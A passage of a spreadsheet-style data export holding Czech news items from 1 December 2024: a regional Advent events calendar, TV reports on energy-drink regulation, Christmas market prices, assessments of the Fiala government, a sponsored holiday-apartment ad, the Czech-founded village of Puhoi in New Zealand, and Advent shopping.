X-tet, vstupné dobrovolné Místo konání: Kostel Nanebevzetí Panny Marie, Lukavice • HALELUJA BAND 7. 12. 2024, 17.00 Vstupné: dobrovolné Místo konání: Kostel sv. Jakuba Většího , Skuhrov nad Bělou • VÁNOČNÍ DISCO PÁRTY 7. 12. 2024, 20.00 Vstupné: 150 Kč Místo konání: MK Sokolovna • VÁNOČNÍ KONCERT RDS 10. 12. 2024, 18.00 Účinkují pěvecké sbory: Písnička, Ptáčata, Carmina alta (RDS) Místo konání: Kostel Slatina n. Zd. • VÁNOČNÍ KONCERTY RDS 11. 12. 2024 Účinkují pěvecké sbory: Rolnička, Carmina (RDS) Místo konání: Skuhrov nad Bělou (17.00), Solnice (19.00) • VÁNOČNÍ KONCER CARMINY ALTY 12. 12. 2024, 18.00 Účinkuje pěvecký sbor Carmina alta (RDS) Místo konání: Trnov • ČESKÁ MŠE VÁNOČNÍ J.J.RYBY „HEJ MISTŘE“ 15. 12 .2024 Účinkuje Carmina, Carmina alta a orchestr ZUŠ Týniště nad Orlicí Místo konání: Častolovice (18.00), Třebechovice pod Orebem (15.00) • MISTŘI SVÉHO ŘEMESLA Do 20. 4. 2025 Prezentace držitelů ocenění Zlatý kolovrat a Mistr tradiční rukodělné výroby Královéhradeckého kraje. Výstava ukáže, že lidové řemeslo je stále živé, přizpůsobuje se dnešní době a přejímá moderní prvky tak, aby jeho autenticita byla zachována a zároveň vyhověla současnému životnímu stylu. Místo konání: Muzeum krajky Vamberk RŮZNÉ • ALENA MAŠKOVÁ, ANO, JSEM AUTISTA – VZORNÍČKY Do 31. 12. 2024 Výstava, o Aspergerově syndromu a dyslexii. Zde je možná paralela se vzorníky, jen tady je to ještě složitější, takový běh na celý život. Místo konání: Muzeum krajky Vamberk • KRAJKÁŘKA JANA ŠTEFKOVÁ Do 31. 3. 2025 Krajkářku Janu Štefkovou z Vamberka provází celý život klapot paliček. V roce 2020 získala ocenění Nositelka tradiční lidové kultury. Místo konání: Muzeum krajky Vamberk • VÁNOČNĚ NA KOPEČKU 14. 12. 2024, 10.00 - 17.00 Tradiční vánoční řemeslný jarmark Místo konání: Sdružení Neratov , Bartošovice v Orlických horách • ROKYTNICKÝ VÁNOČNÍ JARMARK 7. 12. 2024, 13.00 – 17.00 Zboží s vánoční tématikou, lidové zvyky, široká nabídka občerstvení, hudební vystoupení, vánoční dílničky. Místo konání: Rokytnice v O. h. Sýpka – Muzeum Orlických hor • BETLÉMY 1., 7., 8., 14., 15., 21., 22. 12. 2024, 10.00 – 16.00 25., 26. 12. 2024, 13.00 – 16.00 Betlémy neodmyslitelně patří k Vánocům. Přijďte se podívat na výstavu papírových betlémů ze soukromých sbírek seniorů z Opočenska a ze státního zámku Opočno . Místo konání: Zahrada kláštera kapucínů, Kupkovo náměstí 132, Opočno • VÁNOČNÍ JARMARK NA POHODU 8. 12. 2024, 14.00 Místo konání: okolí kostela sv. Víta v Častolovicích • VÁNOČNÍ KONCERT POUTNÍCI 8. 12. 2024, 18.00 Vstupné: 250 Kč. Místo konání: Kostel sv. Víta v Častolovicích • DASHA A PAJKY PAJK 21. 12 .2024, 19.00 Vstupné: 500 Kč Místo konání: Kulturní dům Kvasiny • JAK JSME PUTOVALI DO ŘÍMA ZA SVATÝM OTCEM A ZPĚT" Pá 27. 12. 2024, 16.00 Beseda, pořádá Rychnovský chrámový sbor. Vstup Volný Místo konání: Pelclovo divadlo, malý sál Sportovní události • HRÁTKY PRO PŘEDŠKOLÁKY Soboty do 14. 12. 2024, 9.00 – 12.00 Pro rodiče a děti ve věku 1-6 let. Vstupné: 50 Kč / osoba Místo konání: ZŠ Javornická, tělocvična • PŘIJĎTE SI HRÁT S MÍČEM Pátky, 14.00 – 15.00 Soutěže a hry s míčem pro dívky 1. třídy a předškolačky Místo Konání: ZŠ Javornická Kontakt RÉMA RK: 736 674 440. Vaše pozvánky do kulturního a sportnovního přehledu posílejte na e-mailovou adresu Rychnovského zpravodaje zpravodaj@rychnov-city.cz Prezentace akcí na této straně je zdarma.</t>
  </si>
  <si>
    <t>20241201_39_3479328112_387c9aef2a26b37f0fb3.html</t>
  </si>
  <si>
    <t>387c9aef2a26b37f0fb3</t>
  </si>
  <si>
    <t>Regulace prodeje energetických nápojů dětem</t>
  </si>
  <si>
    <t>Regulace prodeje energetických nápojů dětem Moderátor Martin Pouva : Velké vášně vzbudila debata o regulaci prodeje energetických nápojů dětem v dnešním pořadu Za pět minut dvanáct. Poslanecký návrh zákona, který nedávno podpořila vláda, počítá například s tím, že by se energetické nápoje nesměly dostat do rukou dětem mladším patnácti let, podobně jako je tomu v případě alkoholu nebo tabáku. Autor Martin Kočárek: Čtvrtina chlapců a pětina dívek podle průzkumů užívá energetické nápoje. Lékaři a nutriční specialisté přitom před jejich konzumací varují, především kvůli vysokému obsahu cukru a kofeinu. Vláda proto podpořila návrh regulace. Martina Ochodnická /TOP 09/ členka Výboru pro zdravotnictví PSP ČR: Ten zákon opravdu potřebujeme. Dokazují to data, data srovnávání té, toho užívání energetických nápojů u dětí a velmi stoupající tendence, kdy spotřeba u chlapců v roce 2018 byla 16 procent a dnes je 22 %. Michal Dyttert, prezident Svazu výrobců nealkoholických nápojů: Ten základ toho zákona, to znamená, že zákon, jak definuje energetický nápoj jako návykovou látkou, je úplně špatně. Není možné v zákoně nedefinovat pojem, co je to vlastně energetický nápoj. Takže my říkáme za svaz, že ten návrh zákona i vlastně paskvilem, protože on se snaží regulovat něco, co nedefinuje. Autor Martin Kočárek: Svazu výrobců vadí především neexistující definice toho, co je to vlastně energetický nápoj a skálopevně tvrdí, že takové nápoje nejsou návykové. Poslanecký návrh se opírá o studie, podle kterých návykové jsou. Michal Dyttert, prezident Svazu výrobců nealkoholických nápojů: To je celé zle. To se musí přepsat a já si myslím, že Ministerstvo zdravotnictví a Ministerstvo zemědělství to udělají tak, aby to dávalo smysl. Protože toto smysl vůbec nedala nemůžeme definovat energicky nápoj jako návykový, když návykový není, že ano. To je úplně nesmysl. Martina Ochodnická /TOP 09/ členka Výboru pro zdravotnictví PSP ČR: Může vyvolat návyk. Michal Dyttert, prezident Svazu výrobců nealkoholických nápojů: Nemůže. Martina Ochodnická /TOP 09/ členka Výboru pro zdravotnictví PSP ČR: Může. Michal Dyttert, prezident Svazu výrobců nealkoholických nápojů: Nemůže. Autor Martin Kočárek: Návrh zákona prý není definitivní. Například Polsko a Maďarsko se snaží zákonem omezovat spotřebu cukru. Martina Ochodnická /TOP 09/ členka Výboru pro zdravotnictví PSP ČR: Můžeme se bavit i o dalších látkách, které mohou spadnout do tohoto zákona, anebo se může vytvořit úplně nový zákon. Michal Dyttert, prezident Svazu výrobců nealkoholických nápojů: Pardon, takže nám chcete zakázat i cukr? Martina Ochodnická /TOP 09/ členka Výboru pro zdravotnictví PSP ČR: Vůbec tímto směrem nemíří. Myslím si, že pan ministr zdravotnictví uvedl, že bude chtít zdaňovat cukr, my tu nikomu nic nezakazujeme, my pouze regulujeme prodej těchto látek dětem do 15 let. Autor Martin Kočárek: Záznam dnešního pořadu za pět minut dvanáct najdete na webu tn.cz.</t>
  </si>
  <si>
    <t>1040000</t>
  </si>
  <si>
    <t>20241201_4_3479519927_01deab25eb6ab970cc5f.html</t>
  </si>
  <si>
    <t>01deab25eb6ab970cc5f</t>
  </si>
  <si>
    <t>Vánoční trhy v Praze: Svařák za stovku a langoš za dvě!</t>
  </si>
  <si>
    <t>Vánoční trhy v Praze : Svařák za stovku a langoš za dvě! AkcniCeny.cz Magazín Vánoční trhy v Praze : Svařák za stovku a langoš za dvě! (Foto: Canva.com) #Vánoce Vánoční atmosféra v Praze je sice nezapomenutelná, ale letos si za ni řádně připlatíme. Ceny na tradičních vánočních trzích se oproti minulým letům výrazně zvýšily. Zatímco dříve jste za svařák zaplatili kolem 80 Kč, letos se jeho cena pohybuje kolem 100 Kč a výše. Podobně na tom jsou i další oblíbené pochoutky jako trdelník, langoš nebo klobása. Svařák a nápoje Svařák 0,2l: od 100 Kč Moravské víno 0,2l: 100 Kč Prosecco 0,2l: 100 Kč Lahvové víno 0,75l: 300 Kč Horká čokoláda: 90 Kč Horké jablko: 100 Kč Teplý zázvor: 90 Kč Čaj: 70 Kč Espresso: 70 Kč Cafe Latte: 90 Kč Capuccino: 90 Kč Sladké dobroty Trdelník: 100 Kč Trdelník s čokoládou: 130 Kč Trdelník se zmrzlinou: 170 Kč Trdelník se zmrzlinou, čokoládou, oříšky, jahodou: 190 Kč Vafle s cukrem: 130 Kč Vafle s čokoládou: 150 Kč Vafle s čokoládou a posypem: 180 Kč Palačinky - čokoláda + banán: 160 Kč Palačinky - čokoláda + kokos: 160 Kč Palačinky - čokoláda + sušenky: 160 Kč Palačinky - čokoláda: 150 Kč Palačinky - jahoda: 150 Kč Palačinky - meruňka: 150 Kč Palačinky - maliny: 150 Kč Palačinky - borůvka: 150 Kč Knedlíky - všechny druhy: 99 Kč Langoš - čokoláda, oříšky: 180 Kč Slané pochoutky Langoš - česnek, sýr, kečup: 180 Kč Langos - zakysaná smetana, sýr: 180 Kč Langoš - zakysaná smetana, sýr, smažená cibule: 180 Kč Langoš - zakysaná smetana, sýr, slanina, červená cibule: 220 Kč Klobása na tácku: 150 Kč Hot dog s klobásou: 150 Kč Hot dog s párkem: 80 Kč Pokud se chystáte na pražské vánoční trhy, připravte si o něco více peněz než v minulých letech. Ceny jsou sice vyšší, ale vánoční atmosféra a vůně pečených kaštanů za to možná stojí. Tipy pro úsporu: Vyhněte se špičce: Pokud chcete ušetřit, vydejte se na trhy raději mimo hlavní hodiny. Některé stánky nabízejí happy hour, tedy nižší ceny u produktů během 10-14 h. Vyzkoušejte street food: Mimo vánoční trhy najdete v centru Prahy mnoho stánků s levnějším občerstvením. I přes vyšší ceny jsou pražské vánoční trhy stále oblíbeným místem pro setkávání a prožití adventní atmosféry. Pokud se rozhodnete navštívit je, užijte si je naplno a nezapomeňte ochutnat alespoň některé z tradičních vánočních pochoutek.</t>
  </si>
  <si>
    <t>30970</t>
  </si>
  <si>
    <t>20241201_40_3479328067_ed3c181ef3bb98e66c87.html</t>
  </si>
  <si>
    <t>ed3c181ef3bb98e66c87</t>
  </si>
  <si>
    <t>Tři roky Fialovy vlády</t>
  </si>
  <si>
    <t>Tři roky Fialovy vlády Moderátor Martin Pouva : Podle premiéra Petra Fialy je současná vládní koalice tím nejúspěšnějším kabinetem v historii. Moderátor Kristina Kloubková : A tak jsme se zeptali odborníků, asociací a svazů i odborů, jak ji hodnotí. Podle některých vláda nenaplnila vysoká očekávání, někteří ale zase hodnotí spíše pozitivně. Moderátor Martin Pouva : Za tu nejúspěšnější ovšem většina dotázaných nepovažuje. Ondřej Preuss , ústavní právník: Nechápu tuto vládu rozhodně jako nejúspěšnější právě z toho důvodu, že ona sama si stanovila kritéria tím, že vyvolala ta očekávání, že opravdu přijdou velké reformy, přijde konsolidace a z velké části to zůstalo skutečně nenaplněno. Možná bych vypíchl Špidlovu vládu z tohoto hlediska, že prostě dokončila ten proces přistoupení k EU, který byl velmi náročný, ale politicky vlastně byla neúspěšná. Miroslav Zámečník , ekonom: Co bych velmi ocenil, je obrovský drive v oblasti výstavby dopravní infrastruktury, ať už dálniční, tak železniční. Na druhou stranu opatrná z mého pohledu byla v oblasti určitých moderních způsobů financování, respektive dosavadního nenalákání významných investorů v odvětvích, která, řekněme, jsou významná do budoucna, já osobně bych na první místo v tomto ohledu dal hned tu první vládu Václava Klause . Robert Němec, předseda České advokátní komory : Pokud bych měl hodnotit spolupráci s Ministerstvem spravedlnosti a skutečně musím potvrdit, za dlouhá léta ta spolupráce je nejlepší. Výsledkem toho je i dosažení dohody o advokátním tarifu, který je stanoven vyhláškou Ministerstva spravedlnosti a který především upravuje odměňování advokátů v režimu tzv., tzv. bezplatné právní pomoci. Josef Středula , předseda ČMKOS : Spoustu věcí se velmi pokazilo, například se zhoršila životní úroveň obyvatel tím, že vláda vůbec nic nedělala s inflací. Hodnotím nejlépe tu, kterou jsem zažil jako první, a to byla vláda Bohuslava Sobotky . Byl velmi dynamický hospodářský růst. Luboš Zajíc , prezident Asociace ředitelů základních škol: Každá z těch vlád přinesla něco dobrého a každá z těch vlád něco nedořešila. Velký problém vidím v tom, že těch změn je příliš, že není nějaká dlouhodobá národní koncepce vzděláváním. Pavel Peterka, hlavní ekonom, XTB: Tempo zadlužování se opravdu podařilo snížit, plníme maastrichtská kritéria a je pravdou, že tyto kroky byly velmi nepopulární, ale výrazně potřebné. I přes řadu slibů se jí nepodařilo nastartovat růst ekonomiky. Z hlediska hospodářské a zahraniční politiky vnímám jako nejúspěšnější první vládu Miroslava Topolánka. Martina Šochmanová, prezidentka České asociace sester: Co se určitě podařilo, je to, že se navýšily kapacity na školách, ať už na středních zdravotnických školách anebo na vysokých školách v rámci bakalářských studií. To určitě je krok, který nám pomůže zastavit tu řítící se lavinu nedostatku zdravotnických pracovníků. My máme prostor pro zlepšení v tom, abychom racionalizovali ty i studijní a vzdělávací obory. Radka Vladyková, ředitelka Svazu měst a obcí: Se úplně nepodařila digitalizace stavebního řízení. Ale co se podařilo, tak třeba automatická valorizace odměňování členů zastupitelstva a podařily se některé dílčí změny. Milan Školník, politolog, Provozně ekonomická fakulta, ČZU v Praze : Samozřejmě každý politik bude říkat, že nejúspěšnější. Je potřeba vnímat samozřejmě volební výsledky. Je to je nejlepší vysvědčení. Josef Středula , předseda ČMKOS : Já si myslím, že to je tak za čtyři minus a mohou se těch posledních několik měsíců zlepšit známku na 4. Autor Marek Bruna: To nejdůležitější vysvědčení kabinetu Petra Fialy ale vystaví voliči na podzim, kdy budou vybírat 200 nových poslanců. Moderátor Kristina Kloubková : Podle premiéra Petra Fialy se vládě podařilo naplnit 93 % slibů, ke kterým se zavázala. Z 560 bodů jich podle vládních představitelů kabinet splnil 520. Od některých novinek se ale očekávalo před nástupem vlády víc a je otázkou, zda by měly mít všechny body v programovém prohlášení jinou váhu. Autor Marek Bruna: Digitalizace. Vládě se sice podařilo posunout se v digitalizaci veřejné správy, velkou kaňkou ale zůstává digitalizace stavebního řízení. Systém, který měl ulehčit práci úředníkům, stavebníkům i projektantům, skončil fiaskem a odchodem jedné strany do opozice. Jan Holický , předseda Sdružení tajemníků městských a obecních úřadů: Ten systém v tuto chvíli má tolik nefunkcionalit, že není plnohodnotný a některá řízení skutečně není možné dokončit. Autor Marek Bruna: Stabilizace veřejných financí a snižování rozpočtových schodků. Kabinetu se podle ekonomů daří snižovat státní dluh a rozpočtové schodky, tempo by ale mohlo být podstatně rychlejší. Návrhy Národní ekonomické rady vlády, které by k tomu přispěly, ale nedopadají na úrodnou půdu. Vít Hradil , hlavní ekonom, CYRRUS: NERV připravil poměrně velký seznam nežádoucích bodů pro obnovení ekonomického růstu. I pro tu konsolidaci veřejných financí a spoustu těch dobrých návrhů, proti kterým v podstatě odborně nejde nic namítat, tak zůstalo ležet na stole. Autor Marek Bruna: Mezi ně patří například snížení počtu samospráv, flexibilnější podmínky na trhu práce nebo zdanění tichého vína , které po dlouhých debatách zřejmě není na pořadu dne. To, že bude vláda v sazbě spotřební daně zohledňovat škodlivost, bylo také jedním z vládních slibů. Role tripartity, vláda chtěla zachovat důležitou roli tripartity, tedy že jednání mezi ní, odbory a zaměstnavateli budou konstruktivní. Za konstruktivní je ale odboráři neoznačují. Josef Středula , předseda ČMKOS : Musím říct, že s ministry se z lidského hlediska komunikovat rozhodně dá. Co se týká sociálního dialogu, to znamená hledání nějaké shody společné se zaměstnavateli, s námi takto dopadlo většinou tak, že když jsme se dohodli, tak ve finále to vláda byla schopná shodit se stolu. Autor Marek Bruna: Ve svém programovém prohlášení vláda ale také slíbila to, že vybere českého národního ptáka. Zda se jím stane sokol, sojka, ledňáček nebo jiný opeřenec ale ani po třech letech nevíme.</t>
  </si>
  <si>
    <t>20241201_41_3479828933_251fca8c7e5c24b21c70.html</t>
  </si>
  <si>
    <t>251fca8c7e5c24b21c70</t>
  </si>
  <si>
    <t>Vánoční trhy ve městech</t>
  </si>
  <si>
    <t>Vánoční trhy ve městech Moderátor Martin Řezníček : I rozsvěcení stromů se váže k začátku adventu. Dnes si tento zážitek dopřálo lidi v Hradci Králové , Jihlavě nebo ve Zlíně . A včera museli policisti na čas uzavřít přístup na zcela zaplněné Staroměstské náměstí v Praze . Moderátor Marcela Augustová : No a právě tam taky začaly největší trhy. Za první víkend je navštívily tisíce lidí. Stánky se všemožným zbožím tam budou do 6. ledna. Autor krajské redakce a Kristýna Kolovrátková: Proplétá se mezi stánky skoro neviditelně. Nic nekupuje, ale bez ní by taky nešlo. Po Staroměstském náměstí se opět rozléhají vánoční melodie a snad i častěji než peněženky lidé vytahují foťáky. Čechů je jen malá část. Většina návštěvníků jsou cizinci. Path, turistka z Irska : Je to tady naprosto báječné. Více stánků s vánočními dekoracemi. Doma je to hlavně o jídle. Autor krajské redakce a Kristýna Kolovrátková: Třeba pro tuto skupinu ze slovenské Považské Bystrice je výlet do Prahy na první advent už tradicí. Turisté ze slovenské Považské Bystrice : Jsme tu už opakovaně asi tak podesáté v tomto termínu. Neuveden: Dali jsme si přípitek, abychom se tu za rok takto znovu setkali. Neuveden: Já si je vezmu domů k televizi. Prodejkyně: Termoprádlo, to hodně pomáhá. To taky. Tři vrstvy, tři ponožky. Autor krajské redakce a Kristýna Kolovrátková: Poprvé na vánoční trhy do Prahy dorazila tato skupina z Klatov . Daniel Hrach, návštěvník z Klatov : Docela mě to překvapilo. Je tu toho hodně a je tu dost lidí teda. Autor krajské redakce a Kristýna Kolovrátková: A rostou i ceny. Třeba za svařené víno tady teď návštěvníci dají 100 korun, stejně tak za trdelník. To tady v Borovanech na adventních trzích stojí svařák 60 korun. Během dne stánkaře očekávají, že prodají asi stovku takových kelímků. Prodejce v Borovanech : Neděláme to pro nějaký zisk, ale pro to, aby ty lidi ten advent si užili v těch Borovanech a my s nimi. Autor krajské redakce a Kristýna Kolovrátková: Adventní trhy pořádá většina měst. V těch menších jsou ale stánkaři jen o víkendech. Neuveden: Já chci taky. Autor krajské redakce a Kristýna Kolovrátková: Třeba jako ve Slavonicích . Zhruba 15 stánků postavili prodejci na historickém náměstí. Lucie Přibylová, prodejkyně ve Slavonicích : Koledy nám tady hrají, akorát nám k tomu chybí ten sníh, ale my si to prostě uděláme hezký. Návštěvnice z Brna : Je to prostě malý, málo lidí, příjemný a máte to, co jste chtěli, což pro nás je adventní věnec. Autor krajské redakce a Kristýna Kolovrátková: Prvních 30 stánků zaplnilo i náměstí v Uherském Hradišti . Zatím hlavně s jídlem a pitím. Od poloviny prosince se přidají i řemeslníci.</t>
  </si>
  <si>
    <t>654650</t>
  </si>
  <si>
    <t>20241201_42_3478674747_8775fa20625ed7ab2587.html</t>
  </si>
  <si>
    <t>8775fa20625ed7ab2587</t>
  </si>
  <si>
    <t>Svařák za 75 korun, hranolky za 115. Za kolik se občerstvíte na trzích v Berouně</t>
  </si>
  <si>
    <t>Svařák za 75 korun, hranolky za 115. Za kolik se občerstvíte na trzích v Berouně Svařák se dá pořídit za různé ceny. Nejdražší byl u kluziště, kde si účtovali za 0,2 litru 75 korun, naopak nejlevnější u jednoho ze stánků, kde stál 50 korun. Horká medovina vyšla 0,1 litru od 40 do 60 korun, pivo od 40 do 58 korun, grog od 50 do 69 korun, horké jablko od 40 do 50 korun, dětský punč na 55 korun, horká čokoláda od 40 do 50 korun a čaj od 30 do 50 korun. Voda se dala koupit 0,75 l za 39 korun. Stánky s rychlým občerstvením nabízely klobásu za 100 korun, párek v rohlíku od 30 do 65 korun. Tradičně nechyběl stánek s preclíky, které měly nejrůznější příchutě, se sezamem, parmezánem, rozinkami nebo hovězím masem. Vyšly od 79 do 129 korun. Letos se zde smažily i hranolky. Vyšly na 115 korun, s chedarem o 30 korun víc. S trhaným masem pak na 185 korun. Čtenář reportér Koho honila mlsná, mohl ke dvěma stánkům s trdelníky. Cena za něj závisela na náplni. Nejlevnější byl skořicový, vanilkový, s kokosem, s ořechy nebo barevným posypem za 100 korun a nejdražší s nutelou, zmrzlinou a šlehačkou za 180 korun. V nabídce byly i koláče. Frgál bylo možné koupit povidlový, makový, hruškový, meruňkový, malinový, ořechový nebo borůvkový, přičemž ¼ koláče stála 55 korun. Perličkou na závěr bylo 10 svařáků v akci za 580 korun na náměstí Joachima Barranda . Ceny na berounských vánočních trzích nápoje svařák 50-75 Kč horká medovina 40-60 Kč grog 50-69 Kč pivo 40-58 Kč horké jablko 40-50 Kč horká čokoláda 40-50 Kč dětský punč 55 Kč čaj 30-50 Kč voda 0,75 l 39 Kč jídla klobása 100 Kč párek v rohlíku 30-65 Kč preclík 79 -129 Kč hranolky 115 Kč hranolky s trhaným masem 185 Kč frgál (¼) 55 Kč 55 Autor: Jana Hájíčková Autor person Jana Hájičková Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20241201_43_3478605721_12a6565c893bbad1bf4b.html</t>
  </si>
  <si>
    <t>12a6565c893bbad1bf4b</t>
  </si>
  <si>
    <t>Užijte si dovolenou ve&amp;nbsp;Velkých Karlovicích: Haferky vás dostanou do kolen!</t>
  </si>
  <si>
    <t>Užijte si dovolenou ve&amp;nbsp; Velkých Karlovicích : Haferky vás dostanou do kolen! Domů Články Lyžařské oblasti Užijte si dovolenou ve Velkých Karlovicích : Haferky vás dostanou do kolen! Užijte si dovolenou ve Velkých Karlovicích : Haferky vás dostanou do kolen! Lyžařské oblasti | 01.12.2024 | komerční prezentace foto: www.haferky.cz Zkuste vypnout a vychutnejte si pobyt ve Velkých Karlovicích , které leží v podhůří Javorníků a Beskyd . Zdejší apartmány Haferky nabízejí veškerý luxus pro aktivní i odpočinkovou dovolenou. A je jedno, kolik dní zde strávíte, i během pouhého víkendu tu načerpáte potřebné síly. Budete se zde cítit jako v bavlnce. Apartmány Haferky mají naprosto strategickou polohu, kterou ocení jak party kamarádů, tak rodiny s dětmi nebo páry. V nejbližším okolí najdete veškerou infrastrukturu, restaurace, obchody. Navíc hned v těsné blízkosti máte možnost sportovního vyžití – v zimě na lyžích či běžkách, přes rok na kolech a v létě třeba na zdejším obecním koupališti. Výhodou ale je, že komu se nebude chtít vyrazit ven, užije si parádní pobyt i přímo v apartmánu. Ubytování v kompletně zařízených moderních apartmánech poskytuje díky uzavřenému areálu naprosté soukromí. Ve dvou chalupách jsou k dispozici dva menší a dva větší apartmány. V každém z nich je privátní finská sauna, která zahřeje i největšího „zmrzlíka“. Dva větší apartmány mají k dispozici také soukromou celoročně vyhřívanou vířivku. Díky umístění na velké terase si v ní užijete skvělou atmosféru i ve večerních hodinách, a to s výhledem na okolní krásnou valašskou přírodu. Každý apartmán má k dispozici terasu s posezením, kde si můžete vychutnat čaj, grog či sklenku vína . Větší apartmány, Ondřej a Modřín, mají obytnou plochu 54 m² s terasou 40 m². Menší apartmány v přízemí, Smrk a Anna, mají obytnou plochu 40 m² s terasou o ploše 10 m². Kdo bude chtít spojit pobyt s aktivním pohybem, má nepřeberné množství možností. Příznivci cyklistiky si mohou vybrat z několika typů tras, od nenáročných v rámci páteřní Cyklostezky Bečva až po hřebenové trasy určené zkušeným bikerům. Taktéž turisté si zde přijdou na své: hustá síť atraktivních turistických tras v Javorníkách a Beskydech je přístupná přímo z areálu Haferek. Nejrušněji ale bývá ve Velkých Karlovicích v zimě. Jen v okolí se nachází téměř šest kilometrů sjezdovek. V blízkosti apartmánů Haferky je i nejdelší místní sjezdovka, a to ve ski areálu U Bambuchů, která měří přes 700 metrů. Lyžaři mají možnost pořídit si také výhodný ski pas do celého Skiregionu Valašsko a každý den si vyzkoušet jinou sjezdovku. Vybírat lze ze ski areálů Kohútka, Kyčerka , Karolinka , Bílá , Kasárna, Soláň a Jezerné. Všechny jsou vzdálené do 20 minut jízdy autem z Haferek. Přímo z apartmánů pak můžete nastoupit na upravovaný běžkařský ovál, ze kterého vedou nádherné trasy do blízkého i širokého okolí. Haferky ale turisté vyhledávají také v létě. Součástí areálu je beachvolejbalové hřiště, hosté si ale mohou zahrát také šipky, florbal, stolní tenis nebo basketbal. Takřka naproti Haferkám je pak příjemné vyhřívané venkovní obecní koupaliště se zázemím pro děti. Pro hosty je dále k dispozici kolárna s dostatečným počtem 230V zásuvek pro nabíjení elektrokol, myčka na kola a ohniště s grilovacím roštem a posezením. Nadstandardně vybavené apartmány Haferky vám splní veškeré představy o vysněné dovolené. Více informací a přehledný rezervační systém: Autor: komerční prezentace</t>
  </si>
  <si>
    <t>6930</t>
  </si>
  <si>
    <t>9230</t>
  </si>
  <si>
    <t>20241201_44_3479503543_02f67820996d1d98efba.html</t>
  </si>
  <si>
    <t>02f67820996d1d98efba</t>
  </si>
  <si>
    <t>Česká vesnice na Zélandu</t>
  </si>
  <si>
    <t>Česká vesnice na Zélandu Moderátor Roman Šebrle : Češi na rozdíl od jiných evropských národů nikdy nepatřili mezi kolonizátory. Ale věřili byste tomu, že se najde výjimka, a to dokonce na druhé straně světa, tisíce km daleko, na Novém Zélandu ? Moderátor Soňa Porupková: V 19. století tam skupina Čechů založila vesnici. Unikátní příběh zaujal i prezidenta Petra Pavla , který je právě na Novém Zélandu na zahraniční cestě. Moderátor Roman Šebrle : A pokud si načtete QR kód z reportáže, můžete se podívat, jak prezident zazpíval maorskému kmeni. Vysoký jalovec v podání Petra Pavla původní obyvatelé Nového Zélandu uchvátil. Autor Jan Socha: Puhoi. Nenápadná vesnice uprostřed zelených kopců v panenské přírodě. Podle názvu byste to neuhádli, ale právě toto je místo, které před desítkami let osídlili Češi. Osada vznikla už v roce 1863, kdy jsem dorazila skupina emigrantů z Plzeňska . Jenny Schollumová, historička: Ti lidé sem přišli, protože v Česku nemohli vlastnit svou půdu. Když dorazili na Zéland , aucklandská vláda jim umožnila tady půdu vlastnit a založit osadu. Autor Jan Socha: Není divu, že právě jsem dorazil v rámci státní návštěvy Nového Zélandu i český prezident Petr Pavel . A byla to víc než symbolické návštěva. Kostel, který se tady nachází, nese jméno Petra a Pavla . Ujít si to nenechala ani tato česká turistka. Neuveden: Včera jsem se dozvěděla, že po třech týdnech, co tedy jdu, že tady je pan prezident na druhý den, takže jsem si řekla, že počkám. Autor Jan Socha: Český jazyk tady ale nenajdete. Současní obyvatelé ho už neovládají. Neuveden: Je tedy taková vesnická atmosféra, jsou tu přátelští lidé a hlavně hodně prostoru. Autor Jan Socha: Původní obyvatelé tady připomínají české vlajky. Před pandemií, české pivo v místní hospodě, ale hlavně muzeum, které teď vzniká. Jenny Schollumová, historička: Je to unikátní příběh, který v muzeu vyprávíme pomocí některých artefaktů, které tady máme. Autor Jan Socha: Co tady českého není, to jsou ceny. Život tady levný není, ostatně jako na celém Novém Zélandu . Neuveden: Život je drahý, není to vždy jednoduché. Teď mám sice práci, stejně jako manžel, ale dům si třeba musíme pronajímat. Autor Jan Socha: Aktuálně žije v Puhoi bezmála 400 obyvatel.</t>
  </si>
  <si>
    <t>661690</t>
  </si>
  <si>
    <t>20241201_45_3479503248_75e6fda0e6ccfee35423.html</t>
  </si>
  <si>
    <t>75e6fda0e6ccfee35423</t>
  </si>
  <si>
    <t>První adventní neděle je tady</t>
  </si>
  <si>
    <t>První adventní neděle je tady Moderátor Roman Šebrle : S první adventní nedělí startuje i nákupní horečka. Lidé už dnes plnili obchodní centra, kupovali jak dárky, tak třeba i vánoční stromky. Moderátor Soňa Porupková: A jiní sháněli na poslední chvíli věnce, aby dnes podle tradice mohli zapálit první svíčku, stejně jako my ve studiu. Autor Laura Doubková: Přeplněná parkoviště, davy lidí v obchodních centrech. Přesně v takovém duchu se nesla první adventní neděle. Někteří nakupovali vánoční dárky nebo dokupovali vánoční ozdoby. Neuveden: Už jsme něco nakoupili. Děti jsou malé, takže hračky malinkým. Těm starším, někteří chtějí peníze a někteří chtějí oblečení. Neuveden: Chtěli jsme ještě dokoupit nějaký dekorace na Vánoce. Neuveden: Elektronika, hračkářství, parfumérie. Autor Laura Doubková: Dnešní den byl pro některé řidiče zkouškou trpělivosti. Obchodní centra praskala ve švech. Sehnat volné parkovací místo někde nebylo vůbec snadné. Neuveden: Z obchodu do obchodu, podívejte se, tady nejde ani kde zaparkovat. Manželka mi dala nějaký seznam věcí, co musím sehnat, pokoupit, takže lítám sem a tam. Autor Laura Doubková: A byli i tací, kteří dnešek využili k nákupu toho nejdůležitějšího. Neuveden: První adventní neděle a vánoční stromky už jdou na dračku. Neuveden: Pokud se dodrží pravidla, takový stromek vydrží až do Vánoc. Neuveden: Když to jde, tak ve studenu, balkon nebo ve vodě trošku kmínek, oloupat tu kůru dole trochu. A to déle vydrží. A nedávat to k topení. Neuveden: Živý, pro děti. Borovička nepadá, víte? Neuveden: Určitě živý. Určitě. Radši borovičku. Neuveden: Jedlička nebo smrček. Neuveden: Šel jsem koupit vánoční stromek. Neuveden: A jaký? Neuveden: Nevím. Neuveden: Jiní zase využili veřejných kluzišť a vyrazili na led. Neuveden: Teď jsem byl venku s kamarádem, užíváme adventu. Večer asi zapálíme svíčku. Neuveden: Vyrazili jsme na bruslení a je to super. Neuveden: A vidím, hele tady lidé jezdí na bruslích. Autor Laura Doubková: A umíte bruslit nebo se budete učit? Neuveden: Umíme. Autor Laura Doubková: A klasikou byly i vánoční trhy na pražském Staroměstském náměstí . Neuveden: Procházíme tady po náměstí a moc se nám tady líbí. Jsme tady prvně. Neuveden: Tak já jsem bývalý Pražák, takže já to znám, ale tak teď je to úplně o něčem jiným, než to bylo dřív. Ale je fakt to hezké. Neuveden: Úplně super. My jsme přišly ze Slovenska , z Martina a těšíme se. Okoštovali jsme vařené víno , kaštany. Neuveden: Stromeček je krásný, tak jsme si ho přišli vyfotit. Ale celkově ta atmosféra je úžasná. Autor Laura Doubková: Na adventních věncích se dnes rozhořela první ze svící 